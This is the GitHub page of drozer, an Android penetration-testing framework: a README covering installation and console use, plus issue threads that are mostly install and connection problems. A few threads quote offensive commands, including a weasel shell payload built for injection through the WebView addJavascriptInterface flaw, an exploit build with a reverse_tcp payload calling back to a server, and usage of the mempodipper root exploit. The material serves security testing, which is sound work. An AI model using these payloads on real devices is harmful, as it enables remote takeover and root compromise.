The Leading Security Assessment Framework for Android.

Overview

drozer

----------------------------------------------------------------

NOTE

We would like to formally announce that F-Secure has stopped further development of the drozer tool. With the amount of testing tools and techniques that have been developed since drozer's inception, it would be near impossible to incorporate everything into one tool.

However, we still think drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.

To help with making sure drozer can be ran on modern systems, a Docker container was created that has a working build of Drozer.

----------------------------------------------------------------

drozer (formerly Mercury) is the leading security testing framework for Android.

drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

drozer is open source software, maintained by MWR InfoSecurity, and can be downloaded from: https://labs.f-secure.com/tools/drozer/

Build Status

Linux / OSX

Develop:

Build Status

Master:

Build Status

Windows

Build status

Prerequisites

  1. Python2.7

Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

  1. Protobuf 2.6 or greater

  2. Pyopenssl 16.2 or greater

  3. Twisted 10.2 or greater

  4. Java Development Kit 1.7

Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

  1. Android Debug Bridge

Installing

Building Python wheel

git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python setup.py bdist_wheel

Installing Python wheel

sudo pip install dist/drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

git clone https://github.com/FSecureLABS/drozer.git
cd drozer
make deb

Installing .deb (Debian/Ubuntu/Mint)

sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

git clone https://github.com/FSecureLABS/drozer.git
cd drozer
make rpm

Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -I drozer-2.x.x-1.noarch.rpm

Building for Windows

NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi 

Installing (Arch Linux/BlackArch)

On BlackArch or any Arch-based linux distribution where BlackArch repository was enabled:

pacman -S drozer

PKGBUILD

Installing (Arch Linux/AUR)

With any pacman wrapper:

pikaur -S drozer

PKGBUILD (WARNING: out-of-date)

Usage

Installing the Agent

Drozer can be installed using Android Debug Bridge (adb).

Download the latest Drozer Agent here.

$ adb install drozer-agent-2.x.x.apk

Starting a Session

You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you’re ready to start exploring.

We will use the server embedded in the drozer Agent to do this.

If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

$ adb forward tcp:31415 tcp:31415

Now, launch the Agent, select the “Embedded Server” option and tap “Enable” to start the server. You should see a notification that the server has started.

Then, on your PC, connect using the drozer Console:

On Linux:

$ drozer console connect

On Windows:

> drozer.bat console connect

If using a real device, the IP address of the device on the network must be specified:

On Linux:

$ drozer console connect --server 192.168.0.10

On Windows:

> drozer.bat console connect --server 192.168.0.10

You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
dz>

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

You are now ready to start exploring the device.

Command Reference

Command Description
run Executes a drozer module
list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell Start an interactive Linux shell on the device, in the context of the Agent process.
cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
clean Remove temporary files stored by drozer on the Android device.
contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo Print text to the console.
exit Terminate the drozer session.
help Display help about a particular command or module.
load Load a file containing drozer commands, and execute them in sequence.
module Find and install additional drozer modules from the Internet.
permissions Display a list of the permissions granted to the drozer Agent.
set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset Remove a named variable that drozer passes to any Linux shells that it spawns.

License

drozer is released under a 3-clause BSD License. See LICENSE for full details.

Contacting the Project

drozer is Open Source software, made great by contributions from the community.

For full source code, to report bugs, suggest features and contribute patches please see our Github project:

https://github.com/FSecureLABS/drozer

Bug reports, feature requests, comments and questions can be submitted here.

Comments
  • Drozer Shell Injection, Octal Escaping and /system/bin/ash

    Drozer Shell Injection, Octal Escaping and /system/bin/ash

    In the "WebView addJavascriptInterface Remote Code Execution" article, there is a great introduction to drozer payload injecting using the addJavaScriptInterface flaw. However, I think the payload delivery method is broken on Android devices running /system/bin/ash.

    The article recommends this line for creating a payload to inject through malicious JavaScript:

    $ drozer payload build weasel.shell.armeabi | grep echo | awk -F \" {'gsub("\\\\","\\\\");
    print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"'}
    

    Which will give you a one liner:

    execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);
    

    However, it does not appear that the /system/bin/sh (which is ash) appropriately accommodates octal escaping in this manner:

    # /system/bin/sh -c echo -e "\0177\0105\0114\0106\0001\0001" >f
    # ls -l f
    -rw-rw-rw- root     root            1 2013-10-12 23:06 f
    

    It looks like ash does not preserve the input data, leaving us with a 1 byte file (expected 6 bytes). Not to be discriminatory, ash doesn't preserve the input data for hex escaping either:

    # /system/bin/sh -c echo -e "\x41\x41\x41\x41" >f
    # ls -l f
    -rw-rw-rw- root     root            1 2013-10-12 23:12 f
    

    I'm testing this on an Android API15 emulator. Any thoughts on getting escaped binary content delivered to Android devices for Weasel deployment reliably?

    Thanks,

    -Josh

    opened by joswr1ght 27
  • [Errno 22] Invalid argument

    [Errno 22] Invalid argument

    Hi

    As soon as i try to connect to the virtual device (drozer console connect), i have this error

    drozer Console (v2.3.4) [Errno 22] Invalid argument

    On the virtual device, i see in the app log:

    Accepted connection Starting drozer thread W Connection was reset

    Any idea about what could be the issue?

    Thanks

    Support 
    opened by javixeneize 24
  • Communication protocol redesign

    Communication protocol redesign

    We are looking at redesigning the communications protocol to take this project to the next level.

    The communication protocol is rather simple at the moment and is using a defined XML communication in 1 direction only, from client to server. In order to reach a point where Mercury can be used for many purposes, the following would need to be supported by the communications protocol:

    • Encryption - I suspect something like SSL would be best
    • Bi-directional communications. The ability to have the server connect back to the client OR the client connect to the server would (i.e. Reverse and bind connections) be needed in many applications of Mercury.

    By implementing these, it would be the most flexible. Examples of when a bind connection is needed: current "assessment suite". Examples of when a reverse connection is needed: full exploitation suite

    Any ideas are welcome Tyrone

    Design 
    opened by metall0id 22
  • Mercury hangs on connect

    Mercury hangs on connect

    When typing connect the console hangs on some devices. It has been noted to do this on the Galaxy Nexus. It could be all Ice Cream Sandwich devices as well.

    It is believed that this happens when loading libjackpal-androidterm3.so

    opened by metall0id 17
  • [Errno 22] Invalid argument

    [Errno 22] Invalid argument

    i was using drozer successfully , but suddenly this error is showing while connecting to "[Errno 22] Invalid argument" Could you help me to figure out what wrong i am doing?

    Same happened on other device too.

    Thanks for making wonderful product.

    Support 
    opened by johnconner31 16
  • Include localroot for 4.0.3 <

    Include localroot for 4.0.3 <

    Current public releases of mempodipper most recent local root for android devices based on /proc/pid/mem arbitrary write only supports a few handsets, as the exploit requires you pass it offsets for setuid() and for exit(), and these have only been determined for a number of devices. nesquick95 @ xda developers devised a method for obtaining these offsets, and I have merged his code into the mempodipper exploit. Cross compile for arm, and then run on a vulnerable device:

    ./mempodipper < address to exit> < address to setuid> <-command>

    or now alternatively:

    ./mempodipper - - <-command>

    The dynamic version of mempodipper is relatively untested, and likely needs some work before it is ready to be incorporated into mercury, however most of the work is already done.

    source here: http://pastebin.com/RM4zyy9a

    Module 
    opened by tel0seh 15
  • Unable to install drozer in Kali Linux

    Unable to install drozer in Kali Linux

    i have tried to install drozer with Building for Debian/Ubuntu/Mint and Installing .deb (Debian/Ubuntu/Mint) but both ways didn't worked for me. I am facing this issue while installing the drozer as below : Error 1: cd common; protoc --python_out=../src/pydiesel/api/ protobuf.proto /bin/sh: 1: protoc: not found make: *** [Makefile:55: src/pydiesel/api/protobuf_pb2.py] Error 127

    Error 2: dpkg: dependency problems prevent configuration of drozer: drozer depends on python-protobuf (>= 2.4.1); however: Package python-protobuf is not installed.

    dpkg: error processing package drozer (--install): dependency problems - leaving unconfigured Errors were encountered while processing: drozer

    i have installed protobuf also using pip command, but still getting this same issue.

    opened by parteeksingh005 14
  • Error when building sample exploit

    Error when building sample exploit

    Hi,

    I was following the user guide and trying to get the exploit shown in the guide working, but it throws an error "could not repack the agent sources". See below

    $ drozer exploit build exploit.remote.browser.nanparse --payload weasel.reverse_tcp.armeabi --credentials weasel pass1234 --server 0.0.0.0:31415 --resource /home.html
    Uploading weasel to /weasel and W...  [  OK  ]
    Packaging an Agent... (this may take some time)
    could not repack the agent sources
    
    Uploading the Agent to /agent.apk and A...
    $
    

    Also the user guide is kinda outdated, it has incorrect syntax and exploit name, in addition to typo.

    However, all these don't mask the fact that drozer is a very promising tool, if the exploit list is actively maintained.

    Thanks!

    Bug Report 
    opened by mrpinghe 12
  • MWR Code licence

    MWR Code licence

    Hi, We are a little bit worried about the license of Mercury. Since it is not a well known license we are not sure if we will be allowed to keep working on it in the future. I'm sure the people that work on Mercury would be more confortable if it is licensed under a well known license such as Apache or GPL. And maybe more people would be interested to contribute to the project.

    Question 
    opened by luander 11
  • Failed install of Drozer 2.4.4

    Failed install of Drozer 2.4.4

    Steps to reproduce

    1.I am trying to install Drozer 2.4.4 when I try to run the command "python setup.py bdist_wheel" 2.I have installed and verified the prereqs. I have cloned the repository

    I receive the following error Traceback (most recent call last): File "setup.py", line 4, in import setuptools ImportError: No module named setuptools cparker@cparker-Latitude-E7470:~/drozer$

    Environment

    Ubuntu 20.10 cparker@cparker-Latitude-E7470:~$ java --version openjdk 11.0.9.1 2020-11-04 OpenJDK Runtime Environment (build 11.0.9.1+1-Ubuntu-0ubuntu1.20.10) OpenJDK 64-Bit Server VM (build 11.0.9.1+1-Ubuntu-0ubuntu1.20.10, mixed mode, sharing)

    I have Googled the error and tried to correct it.

    cparker@cparker-Latitude-E7470:~$ sudo apt-get install python-setuptools Reading package lists... Done Building dependency tree
    Reading state information... Done python-setuptools is already the newest version (44.1.1-1). 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

    opened by parkclay 10
  • Error during install Drozer

    Error during install Drozer

    Steps to reproduce

    git clone https://github.com/mwrlabs/drozer/
    cd drozer
    python setup.py bdist_wheel
    

    Expected behaviour

    should Building Python wheel

    Actual behaviour: root@kali:~/drozer# python setup.py bdist_wheel Traceback (most recent call last): File "setup.py", line 132, in version = get_version(), File "setup.py", line 128, in get_version return subprocess.check_output(version_cmd).split('-', 1)[0] File "/usr/lib/python2.7/subprocess.py", line 216, in check_output process = Popen(stdout=PIPE, *popenargs, **kwargs) File "/usr/lib/python2.7/subprocess.py", line 394, in init errread, errwrite) File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child raise child_exception OSError: [Errno 2] No such file or directory

    Environment

    Operating system:Linux Kali

    **Java Version:**1.7

    Drozer Version: latest clone

    please help

    opened by alonf1983 10
  • WheN try to setup drozer it shows SyntaxError: invalid syntax

    WheN try to setup drozer it shows SyntaxError: invalid syntax

    Steps to reproduce

    Hi, I have face some issue during the installation of drozer. when I try to setup the drozer using python.exe setup.py bdist_msi it shows me this kind error:

    Traceback (most recent call last):
      File "C:\Users\User\Downloads\drozer-develop\setup.py", line 8, in <module>
        from src.drozer import meta
      File "C:\Users\User\Downloads\drozer-develop\src\drozer\meta.py", line 63
        print "%s %s\n" % (name, version)
              ^
    SyntaxError: invalid syntax
    
    

    And That's why I cannot install it. Please can anyone help me to how get rid out of it??

    opened by joyahamad074 0
  • syntex error pleased solve it same problem have many people

    syntex error pleased solve it same problem have many people

    drozer console connect Traceback (most recent call last): File "C:\Python27\Scripts\drozer", line 30, in import("drozer.cli.%s" % (sys.argv[1])) File "C:\Python27\lib\site-packages\drozer\cli\console.py", line 8, in from drozer.console import Console File "C:\Python27\lib\site-packages\drozer\console_init_.py", line 4, in from drozer.console.console import Console File "C:\Python27\lib\site-packages\drozer\console\console.py", line 5, in from pydiesel.api.protobuf_pb2 import Message File "C:\Python27\lib\site-packages\pydiesel\api_init_.py", line 9, in from pydiesel.api.frame import Frame File "C:\Python27\lib\site-packages\pydiesel\api\frame.py", line 3, in from pydiesel.api.protobuf_pb2 import Message File "C:\Python27\lib\site-packages\pydiesel\api\protobuf_pb2.py", line 3, in from google.protobuf import descriptor ImportError: No module named google.protobuf

    opened by kaal-kali 1
  • my own module can't proceed from beginning

    my own module can't proceed from beginning

    here is my module code: ################################################################################ from drozer.modules import Module

    class GetInteger(Module) : name = "Get Device info" description = "A module that returns information about the device and hardware features" examples = "run ex.device.getinteger" date = "10-11-13" author = "Keith Makan" license = "BSD (3-clause)" path = ["ex","device"] def execute (self,arguments) : build = self.new ("android.os.Build") self.stdout.write ("Getting device info . . . \n") self.stdout.write ("[ * ] BOARD : %s\n" % (build.BOARD) ) self.stdout.write ("[ * ] BOOTLOADER : %s\n" % (build.BOOTLOADER) ) self.stdout.write ("[ * ] BRAND : %s\n" % (build.BRAND) ) self.stdout.write ("[ * ] CPU__ABI : %s\n" % (build.CPU__ABI) ) self.stdout.write ("[ * ] CPU__ABI2 : %s\n" % (build.CPU__ABI2) ) self.stdout.write ("[ * ] DEVICE : %s\n" % (build.DEVICE) ) self.stdout.write ("[ * ] DISPLAY : %s\n" % (build.DISPLAY) ) self.stdout.write ("[ * ] FINGERPRINT : %s\n" % (build.FINGERPRINT) ) self.stdout.write ("[ * ] HARDWARE : %s\n" % (build.HARDWARE) ) self.stdout.write ("[ * ] MANUFACTURER : %s\n" % (build.MANUFACTURER) ) self.stdout.write ("[ * ] MODEL : %s\n "% (build.MODEL) ) self.stdout.write ("[ * ] TAGS : %s\n" % (build.TAGS) )

    ########################################################################### but when i run it , "does not define an execute() method" is showed but i really define the execute. so where is wrong?? image

    opened by boapgt 0
  • Drozer console connect - SyntaxError. Help Please.

    Drozer console connect - SyntaxError. Help Please.

    I tried reinstalling python2.7, reinstalling drozer, setting environment variables, updating modules, installing from another pc. But I get the same message as below. please Help.

    Steps to reproduce

    1. git clone https://github.com/FSecureLABS/drozer.git
    2. cd drozer
    3. python.exe setup.py bdist_msi
    4. install drozer pip2 install pyyaml pip2 install protobuf pip2 install pyopenssl pip2 install twisted pip2 install service_identity
    5. install agent.apk in Nox player
    6. adb forward tcp:31415 tcp:31415
    7. drozer console connect success

    Expected behaviour

    drozer console connect success

    Actual behaviour

    C:\Users\user>drozer.bat console connect
    
    Traceback (most recent call last):
      File "C:\Python27\Scripts\drozer", line 30, in <module>
        __import__("drozer.cli.%s" % (sys.argv[1]))
      File "C:\Python27\Lib\site-packages\drozer\cli\console.py", line 8, in <module>
        from drozer.console import Console
      File "C:\Python27\Lib\site-packages\drozer\console\__init__.py", line 4, in <module>
        from drozer.console.console import Console
      File "C:\Python27\Lib\site-packages\drozer\console\console.py", line 5, in <module>
        from pydiesel.api.protobuf_pb2 import Message
      File "C:\Python27\Lib\site-packages\pydiesel\api\__init__.py", line 9, in <module>
        from pydiesel.api.frame import Frame
      File "C:\Python27\Lib\site-packages\pydiesel\api\frame.py", line 3, in <module>
        from pydiesel.api.protobuf_pb2 import Message
      File "C:\Python27\Lib\site-packages\pydiesel\api\protobuf_pb2.py", line 3, in <module>
        from google.protobuf import descriptor
      File "C:\Python27\lib\site-packages\google\protobuf\descriptor.py", line 113
        class DescriptorBase(metaclass=DescriptorMetaclass):
                                      ^
    SyntaxError: invalid syntax`
    
    

    Environment

    Operating system: Windows 10

    USER Renvironment variables PATH =

    C:\Python27`
    C:\Python27\Scripts
    

    PYTHONPATH =

    C:\Python27\Lib\site-packages
    C:\Users\user\drozer\src
    C:\Users\user\drozer\test
    

    SYSTEM environment variables

    PATH =

    %JAVA_HOME%\bin
    C:\Program Files\Common Files\Oracle\Java\javapath
    

    JAVA_HOME= C:\Program Files\JAVA\jdk-17

    Java Version: Openjdk 17 Python 2.7

    opened by pt615 2
  • ImportError: DLL load failed: %1 is not a valid Win32 application.

    ImportError: DLL load failed: %1 is not a valid Win32 application.

    It's been a while since I've used Drozer via Windows 10.

    I updated to the 2.4.4 version, started the app, forwarded the correct port, but continue to get this error message

    DRZ

    I tried uninstalling dependencies and re-installing them, but with the EOL of Python2.7, it's been growing more and more frustrating. Any help on this would be very appreciated.

    opened by 0x676f64 1
  • [Errno 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond

    [Errno 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond

    Hi, I'm new here and I'm trying to connect my Samsung Galaxy A51 to my Windows 7 x64 in order to run some script that relies on Drozer.

    Steps to reproduce

    1. I've successfully installed Python 2.7.18, Java SE Developer Kit 1.7.0_80, Android Debug Bridge 1.0.41 (31.0.2-7242960) and Drozer 2.4.4 on my Windows 7 x64 computer.
    2. I've successfully added Python 2.7.18, Java SE Developer Kit 1.7.0_80, Android Debug Bridge 1.0.41 (31.0.2-7242960) and Drozer 2.4.4 to System > Advanced Proprieties > Environment Variables > System Variables > Path.
    3. I've successfully installed packages attrs 21.2.0, Automat 20.2.0, cffi 1.14.5, constantly 15.1.0, cryptography 3.3.2, drozer 2.4.3, enum34 1.1.10, hyperlink 21.0.0, idna 2.10, incremental 21.3.0, ipaddress 1.0.23, pip 20.3.4, protobuf 3.17.2, pyasn1 0.4.8, pyasn1-modules 0.2.8, pycparser 2.20, PyHamcrest 1.10.1, pyOpenSSL 20.0.1, PyYAML 5.4.1, service-identity 21.1.0, setuptools 44.1.1, six 1.16.0, Twisted 20.3.0, typing 3.10.0.0, wheel 0.36.2 and zope.interface 5.4.0 to Python 2.7.18.
    4. I've successfully connected my mobile to my PC via factory-provided USB cable and programmed it so that "USB controlled by" is set to "This phone" (I actually tried setting it to "Connected device" first, but it failed and I was forced to settle for "This phone"), "Use USB for" is set to "Transferring files" and "USB debugging" is toggled on (permission for my PC to debug my phone granted, as confirmed by command adb devices returning List of devices attached > RQ8N300XYDH device).
    5. I've successfully installed Drozer Agent 2.3.4 to my Samsung Galaxy A51 mobile phone (OS Android 10).
    6. I've successfully run command adb forward tcp:31415 tcp:31415 as instructed, returning 31415.
    7. I've attempted to run drozer console connect --server 192.168.0.17 (where 192.168.0.17 is my phone's IP address according to Settings > About Phone > Status > IP address), but after roughly 30s, I get a return message
    C:\Program Files\Python27\lib\site-packages\OpenSSL\crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
      from cryptography import utils, x509
    There was a problem connecting to the drozer Server.
    
    Things to check:
    
     - is the drozer Server running?
     - have you set up appropriate adb port forwards?
     - have you specified the correct hostname and port with --server?
     - is the server protected with SSL (add an --ssl switch)?
     - is the agent protected with a password (add a --password switch)?
    
    Debug Information:
    [Errno 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond
    
    

    observations:

    1. The Python error message appears immediately, but variations thereof occur every time I run anything on Python 2.7.18; as long as it says support […] will be removed in the next release rather than this version of Python is not supported, I don't believe that's the root of my problem. In any case, that's it for about 30s, then the rest of the error message (starting with "There was a problem connecting to the drozer Server.") appears. I believe it's trying to connect and failing; I have no idea why.
    2. If by "drozer Server" you mean the computer programme, "Python drozer-2.4.4" (installed via a file drozer-2.4.4.win32.msi I downloaded from https://labs.f-secure.com/tools/drozer/), then yes, it is running. If by "drozer Server" you mean the drozer 2.4.3 package in Python (installed by running python -m pip install drozer on an elevated Command Prompt), then yes, it's running, though it is not the same version number as the Drozer computer programme aforementioned. If by "drozer Server" you mean the "drozer Agent 2.3.4" app on my mobile (installed by downloading a package drozer-agent-2.3.4.apk from https://github.com/FSecureLABS/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk into the platform-tools folder and executing adb install drozer-agent-2.3.4.apk on an elevated Command Prompt), then yes, it's running, though the version number is not the same as either of the above. I've attempted "closing" the app and clearing my RAM memory, then launching it again, turning the "Embedded Server" option off and on again, and running drozer console connect --server 192.168.0.17 anew, but the only change is it only took 25s to return the error message this time (also, the app now records an error message of its own, "IO Error. Resetting connection." > "Stopped." > "Starting Server…" > "Attempting to bind to port 31415…" > "Waiting for connections…"; the latter three messages are the same ones it had been showing before, though, which are still recorded above the error message).
    3. I believe "set[ting] up appropriate adb port forwards" would be that adb forward tcp:31415 tcp:31415 command, right? Did I not execute it correctly?
    4. The "correct hostname and port" would be my mobile's IP address, right? Which is a function of the network, BTW. I've attempted switching networks, which changed the phone's IP address, but the result (replacing the old IP in the command line with the new one) is still the same.
    5. According to the app, SSL is disabled.
    6. In the app settings, there's an option "Password", but the field is empty, and the instructions and tutorials didn't say anything about it being mandatory, so I left it blank (as it was when the app was first installed).
    7. Google has nothing on Errno 10060 regarding Drozer.

    Expected behaviour

    According to the instructions and tutorials, I should be presented with a Drozer command prompt that looks like selecting f75640f67144d9a3 (unknown sdk 4.1.1). I would then be able to run commands on the Drozer console, and the programme would be able to perform DAST (or SAST) on my mobile.

    Actual behaviour

    I get an error message [Errno 10060] because the Drozer on my PC failed to connect to the Drozer Agent on my phone, and therefore cannot start up the Drozer console.

    Environment

    Operating system: Windows 7 x64

    Java Version: Java SE Developer Kit 1.7.0_80

    Android Version: 10

    Drozer Version: 2.4.4 (Windows); 2.4.3 (Python); 2.3.4 (Android)

    Install Method: Installed from .msi package (Windows); python -m pip install drozer (Python); adb install drozer-agent-2.3.4.apk (Android)

    Drozer Config

    No idea. How do I access this file?

    Drozer Error Logs

    C:\Program Files\Python27\lib\site-packages\OpenSSL\crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
      from cryptography import utils, x509
    There was a problem connecting to the drozer Server.
    
    Things to check:
    
     - is the drozer Server running?
     - have you set up appropriate adb port forwards?
     - have you specified the correct hostname and port with --server?
     - is the server protected with SSL (add an --ssl switch)?
     - is the agent protected with a password (add a --password switch)?
    
    Debug Information:
    timed out
    

    ADB Logs

    Running

    adb logcat -c
    adb logcat > drozer_error.log
    

    causes the Command Prompt to stop responding.

    opened by rgiotxy 0
Releases(2.4.4)
Owner
WithSecure Labs
Welcome to WithSecure Labs. Here we publish research, and share our tools with the security community.
WithSecure Labs
🛡️ Android security (camera/microphone dots indicators) app using Hilt, Animations, Coroutines, Material, StateFlow, Jetpack based on MVVM architecture.

??️ Android security app using Hilt, Animations, Coroutines, Material, StateFlow, Jetpack (Room, ViewModel, Paging, Security, Biometrics, Start-up) based on MVVM architecture.

null 639 Jan 6, 2023
An Android app that gives you a password generated by a given phrase with a custom algorithm, it also has password and biometric security.

An Android app that gives you a password generated by a given phrase with a custom algorithm, it also has password and biometric security.

Marcos Ariel Paccor 1 May 23, 2022
Easy app for managing your files without ads, respecting your privacy & security

Simple File Manager Can also be used for browsing root files and SD card content. You can easily rename, copy, move, delete and share anything you wis

Simple Mobile Tools 1.2k Dec 30, 2022
This is the first goland plugin for SCA of Go. It focuses on the dependency security of the Go project.

This is the first goland plugin for SCA of Go. It focuses on the dependency security of the Go project. It will generate the SCA report for the dependencies with vulnerabilities. For the detailed introduction of this plugin, please refer to this article.

Neal Caffery 13 Sep 3, 2022
Extensible Android mobile voice framework: wakeword, ASR, NLU, and TTS. Easily add voice to any Android app!

Spokestack is an all-in-one solution for mobile voice interfaces on Android. It provides every piece of the speech processing puzzle, including voice

Spokestack 57 Nov 20, 2022
android-trinity is tiny proactive framework with much of the scaffolding code required to start a new Android Application.

android-trinity This is tiny framework with much of the scaffolding code (with some nice utilities and prepared source code) required to start a new A

Fernando Cejas 49 Nov 24, 2022
An android Quiz App in kotlin framework and uses Appwrite as backend

Quiz App Intro An android Quiz App in kotlin framework and uses Appwrite as backend How to clone and run the project: Cloning : git clone https://gith

null 2 Oct 22, 2022
conceptual Android audio plugin framework

AAP: Android Audio Plugin Framework disclaimer: the README is either up to date, partially obsoleted, or sometimes (but not very often) ahead of imple

Atsushi Eno 42 Nov 12, 2022
weiV(pronounced the same as wave), a new declarative UI development framework based on the Android View system.

weiV(pronounced the same as wave) 简体中文 if ("weiV" == "View".reversed()) { Log.d( "weiV", "It means Inversion of Control, you shoul

fangbing chen 69 Nov 22, 2022
Android File Fuzzing Framework

Droid-FF : install python dependencies (setup.sh ) and you are good to go. GDB Server for android : get it from @ wget https://people.mozilla.org/~nch

xyz 81 Nov 17, 2022
The News App has been carried out within the framework of the MVVM architecture, information about news is obtained by consulting an API, it is built usisng Jetpack Copose, Coroutines, Dependency Injection with Hilt and Retrofit

Journalist The News App consists of an application that displays the latest news from EEUU from an API that provides official and updated information.

null 0 Nov 3, 2021
A framework for building native applications using React

React Native Learn once, write anywhere: Build mobile apps with React. Getting Started · Learn the Basics · Showcase · Contribute · Community · Suppor

Meta 106.9k Jan 8, 2023
Slack app example for Heroku deployment, written in Kotlin, using Bolt framework.

slack-kotlin-heroku-example Slack app example for Heroku deployment, written in Kotlin, using Bolt framework. You need to configure your Slack app to

null 0 Dec 25, 2021
Hobby-keeping - Platform to record books that you read and games you played! Made with Kotlin and Spring Framework

Hobby Keeping API to record books that you read and games you played! Made with

William Barom Mingardi 1 Jan 29, 2022
Photon Framework provides cool way to Discord Slash Commands 👩‍💻 🚧

Photon Framework provides cool way to Discord Slash Commands ??‍?? ??

Codename Photon 16 Dec 20, 2022
Simple application with some famous graph algorithm implemented by Jetpack Compose framework

GraphAlgorithm This Application was implemented by Jetpack Compose framework. The dagger-hilt library was used for dependency injection and Room libra

Amirreza lotfi 8 Aug 17, 2022
A lightweight tracking framework based on the tracking idea of Buzzvideo.(基于西瓜视频的责任链埋点思路实现的轻量级埋点框架)

Tracker English | 中文 Tracker is a lightweight tracking framework based on the tracking idea of Buzzvideo. Tracking idea Why use chain of responsibilit

DylanCai 76 Dec 22, 2022
android-delicious Delicious Android is an Android app which helps you access and save bookmarks via Delicious. It's available over at Google Play.

Delicious Android Delicious Android is an Android app which helps you access and save bookmarks via Delicious. It's available over at Google Play. Fea

Alexander Blom 137 Nov 20, 2022
Android cutout screen support Android P. Android O support huawei, xiaomi, oppo and vivo.

CutoutScreenSupport Android cutout screen support Android P. Android O support huawei, xiaomi, oppo and vivo. Usage whether the mobile phone is cutout

hacket 5 Nov 3, 2022